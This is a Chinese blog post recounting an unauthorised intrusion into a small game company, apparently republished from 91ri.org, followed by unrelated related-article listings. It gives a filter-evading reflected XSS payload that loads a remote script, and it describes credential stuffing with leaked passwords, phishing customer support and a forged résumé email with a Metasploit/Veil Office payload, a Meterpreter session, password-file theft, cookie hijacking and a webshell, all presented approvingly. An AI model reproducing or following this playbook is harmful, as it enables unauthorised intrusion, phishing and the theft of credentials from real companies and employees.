反射型XSS的逆袭之路
0×00背景
这是一次结合各自技巧的渗透过程,由于原作者的截图不多,我们只是简单叙述一下思路~
目标是一家本地的游戏公司,起因是找到一个反射型xss,但是却被对方公司忽略,而作者身边的一个妹子也在这家公司工作,便起了搞定这家公司的决心。
以下正片
=====================================================
0×01信息收集
目标公司:XX网络科技有限公司(XX游戏)
URL:http://www.xxxxcom.com
http://www.xxxxcom.cn(公司另一域名)
http://www.xxxxcom.cn.com(公司另一域名)
通过浏览主站和查询whois信息,得知其公司工作邮箱,域名所有人信息,HR联系方式等
结合社工库查询,综合得到目标公司一高管信息

工作邮箱直接查询到了密码,但是输入后提示密码错误,看来修改过,但仔细一看,均为有规律的弱口令
三个数字重复或者是键盘向下的方式组合的口令,于是我果断的决定根据这个规律碰撞一下其他密码试试
经过碰撞,把得到的密码丢到burpsuite重复提交到目标公司网站的登陆界面(本来想登录邮箱的,无奈网易有防止重复提交的策略)
跑了好一阵子,未果,碰撞密码,暂时搁浅
后来想起,whois信息中,域名是xinnet的,于是开心的去查询新网的裤子,不过查询结果很失望,密码依旧不对
至此第一次试探搁浅
0×02对目标网站的测试
目标站点进行cms指纹识别后反应是良精南方的,但是看了看用的是.net的 架构,想到去年和小伙伴领1w的原因就是因为发现该站点的漏洞,于是乎又折头看了看,shell已删除,并且管理后台重做过,去年是用的 admin.xxxxcom.com做的后台,现在看了看已经重做,只能放弃,不过好在菜刀还有缓存,通过缓存浏览了web目录下的大概情况,有个 bbs,一个前台,一个主站,均为.net架构,论坛更是Discuz!NT 3.6.711 出名的难日,浏览缓存后发现某目录下存在一富文本编辑器,访问后结果依旧不尽人意

果断放弃之,然后看了看去年找到的一个主站sql注入

装了新的安全狗,无力去继续绕过waf,放弃=。=
唔,那怎么办呢,接下来就对目标站点进行了FUZZ扫描,哟~好吧,就只扫到我之前说的那个xss,还是反射型的,不过突然想到目标公司的人说不就是个跨站么,这句话让我又不开心了起来,哥今天就拿这个屌丝反射型跨站逆袭给你看!
0×03反射型xss的逆袭之路(伪水坑攻击)
因为装了安全狗,所以要稍微进行攻击代码构造绕过一下
该反射构造的代码如下:

通过img标签构造iMg大小写的方式绕过,用onerror属性加 载,
1 |
onerror=eval(javascript:document.write(unescape(' <script src="http://xxx.js"></script>'));) |
对eval操纵的内容进行16进制编码后测试通过
之后进行了第一次攻击尝试
找到客服反馈问题,我说你们游戏的注册页面有问题啊,没办法注册,注册的地址是不是这个啊(然后发了经过短域名处理的攻击url)
一般情况,客服都会来解决问题,但是该公司客服非常奇葩。。。说:哦,我也不知道啊,要不你下载个客户端去注册吧。
经过我机智的对话,仍然没有让其点击连接(给客服大爷您跪了)
第一次水坑攻击尝试失败。。暂时搁浅
91ri.org注:所谓“水坑攻击”,是指黑客通过分析被攻击者的网络活动规律,寻找被攻击者经常访问的网站的弱点,先攻下该网站并植入攻击代码,等待被攻击者来访时实施攻击。文中只是将xss发送到对方那边,等待对方点击,实际上是不能称为水坑攻击的,只能算钓鱼??
0×04第二次信息收集
首次尝试接连受挫,我过了几天在群里打屁,正好那个在这家公司上班的妹子也在,我就顺口问了问公司的情况
大概收集到信息为:
公司员工办公电脑均为win7,文字处理软件有office和wps但是默认使用的是office,公司并没有规定统一
不过好消息是office是默认的,以前看大牛们玩apt的时候都会很流弊的拿出office的漏洞通过邮件攻击搞定一切
做了个简易的接收端,探测公司那边的组件和杀毒软件
通过骗取点击后,接收端收到了session的信息,现在掌握的信息为:office版本为2007,浏览器为IE8,杀毒软件360,以及IP出口
0×05最后的冲锋,反射型xss终于逆袭
一切基本就绪,天随人愿的是我这里正好也有公网ip
但是有360略蛋疼,不过上次听maple说veil比较牛逼,我office用的payload自然是来自msf,那么就结合veil碰碰运气吧。。
找了个fake-email发伪造邮件
大概内容就是一篇求职的,附带了doc,doc里带了msf生成的
为了保险起见,除了附件有doc外,我还在邮件内容里加了经过短域名处理的xss攻击连接
邮件发过去了,一直开着msf等消息,不过貌似人家周日的时候不上班
吓的我一直开着电脑,第二天大概十点过,msf这边有动静了,好吧,可以返回Meterpreter会话了,总算是摸到了目标公司的设备(尽管只是一台个人电脑)
不过运气真不错,不知道是veil的原因免杀了360还是因为人品比较好当时对方360没有开,反正会话是反弹到了,快速的翻了翻对方的盘符,在文档里找到一份对应用户密码的记录,type了一下快速记录下来后把马删了撤退走人(91ri.org:把账号密码存在本机简直是硬伤啊)
好消息一个接着一个,之前在邮件内容中写入的短域名xss也被触发了,果断用其cookie登录,不过比较可惜,因为是反射型,对方后台找不到,只登录了前台

通过前台并没有进入后台的地方,但是论坛和前台互通,所以,嘿嘿~~是个超级版主
0×06尾声
之后的事情就不用说了,shell到手,对应用户密码也在个人电脑上扒拉到,呵呵~

最后我溜达了一圈,把shell删了,走人,只为证明反射型xss也是可以屌丝逆袭高富帅的!
写下这篇文章,默默抽根手边的花玉溪,深藏功与名
强调:自本文发出之前,目标服务器和对方电脑的木马均已删除,本人并未做任何破坏
来自:91ri.org
反射型XSS的逆袭之路的更多相关文章
- RestTemplate的逆袭之路,从发送请求到负载均衡
上篇文章我们详细的介绍了RestTemplate发送请求的问题,熟悉Spring的小伙伴可能会发现:RestTemplate不就是Spring提供的一个发送请求的工具吗?它什么时候具有了实现客户端负载 ...
- 网管到CEO的10年逆袭之路
把我个人近一年来讲的技术人员如何成长的鸡汤课整理了出来,送给大家<网管到CEO的10年逆袭之路>
- 从前端到全栈:JavaScript逆袭之路
JavaScript如何做到上天入地无所不能?JavaScript真的能一统江湖吗? 背景 近年来,前端技术日新月异,前端已经不仅仅是网页,更多的开始由狭义向广义发展. 先后涌现出了具备后端能力的no ...
- 一个吊丝android个人开发者的逆袭之路
转眼间,一年多过去了,记得我开发第一款android应用的时候,那是在前年的冬天,我本人是做java的,android的学习和开发完全是业余爱好,从前年上半年到前年下半年大约花了半年的业余时间把and ...
- 安卓触控一体机的逆袭之路_追逐品质_支持APP软件安卓
显示性能参数 接口:RGB信号 分辨率:1024*600 比例16:9 显示尺寸(A.A.):222.72*(W)*125.28(H)mm 外围尺寸:235.0(W)*143.0(H)*4.5(T)m ...
- 程序人生|从网瘾少年到微软、BAT、字节offer收割机逆袭之路
有情怀,有干货,微信搜索[三太子敖丙]关注这个不一样的程序员. 本文 GitHub https://github.com/JavaFamily 已收录,有一线大厂面试完整考点.资料以及我的系列文章. ...
- 从门外汉到腾讯Android高级研发——一个半路出家菜鸟的艰难逆袭之路
我是在去年3月份加入腾讯公司,目前是腾讯公司某技术部门里面的一个小负责人,年薪月薪大税后概30K,谈不上多么厉害,但在回想自己半路出家学习编程,从一个销售到现在终于进入中国互联网顶尖公司,还是有些许感 ...
- python学习之路(一)屌丝逆袭之路
变量 ...
- Airbnb创始人:屌丝的逆袭之路
这位黑发小帅哥名叫Brian Chesky,是Airbnb的联合创始人. 如果在百度一下Airbnb,你就会看到如下事实:Airbnb,即Air Bed and Breakfast,中国名“空中食宿” ...
随机推荐
- jvm的搭建
首先先 说明一下接下来要用到的,环境变量中的path和classpath的区别 1.path路径用来告诉计算机.exe文件的路径,classpath路径是用来告诉计算机.class文件的路径 2.系统 ...
- Liunx的DHCP配置
1.DHCP简介 (1)DHCP(Dynamic Host Configuration Protocol,动态主机配置协议)是一个简化主机IP地址分配管理的TCP/IP标准协议,用户可以利用DHCP服 ...
- Asp.net core WebApi 使用Swagger生成帮助页
最近我们团队一直进行.net core的转型,web开发向着前后端分离的技术架构演进,我们后台主要是采用了asp.net core webapi来进行开发,开始每次调试以及与前端人员的沟通上都存在这效 ...
- JDK源码之PriorityQueue源码剖析
除特别注明外,本站所有文章均为原创,转载请注明地址 一.优先队列的应用 优先队列在程序开发中屡见不鲜,比如操作系统在进行进程调度时一种可行的算法是使用优先队列,当一个新的进程被fork()出来后,首先 ...
- LeetCode 207. Course Schedule(拓扑排序)
题目 There are a total of n courses you have to take, labeled from 0 to n - 1. Some courses may have p ...
- .net Framework 4.5 新特性async(异步)的初步认识
1.async的简单说明 继版本4.5以前,要想实现异步方法,运用多线程齐头并进.而4.5直接一个async修饰的方法配合await实现异步,这里的底层实现原理暂时未研究, 应该本质都一样,对线程的操 ...
- OpenMP 入门教程
前两天(其实是几个月以前了)看到了代码中有 #pragma omp parallel for 一段,感觉好像是 OpenMP,以前看到并行化的东西都是直接躲开,既然躲不开了,不妨研究一下: OpenM ...
- java并发程序——并发容器
概述 java cocurrent包提供了很多并发容器,在提供并发控制的前提下,通过优化,提升性能.本文主要讨论常见的并发容器的实现机制和绝妙之处,但并不会对所有实现细节面面俱到. 为什么JUC需要提 ...
- 【Spark2.0源码学习】-5.Worker启动
Worker作为Endpoint的具体实例,下面我们介绍一下Worker启动以及OnStart指令后的额外工作 一.脚本概览 下面是一个举例: /opt/jdk1..0_79/ ...
- 蓝桥杯-大衍数列-java
/* (程序头部注释开始) * 程序的版权和版本声明部分 * Copyright (c) 2016, 广州科技贸易职业学院信息工程系学生 * All rights reserved. * 文件名称: ...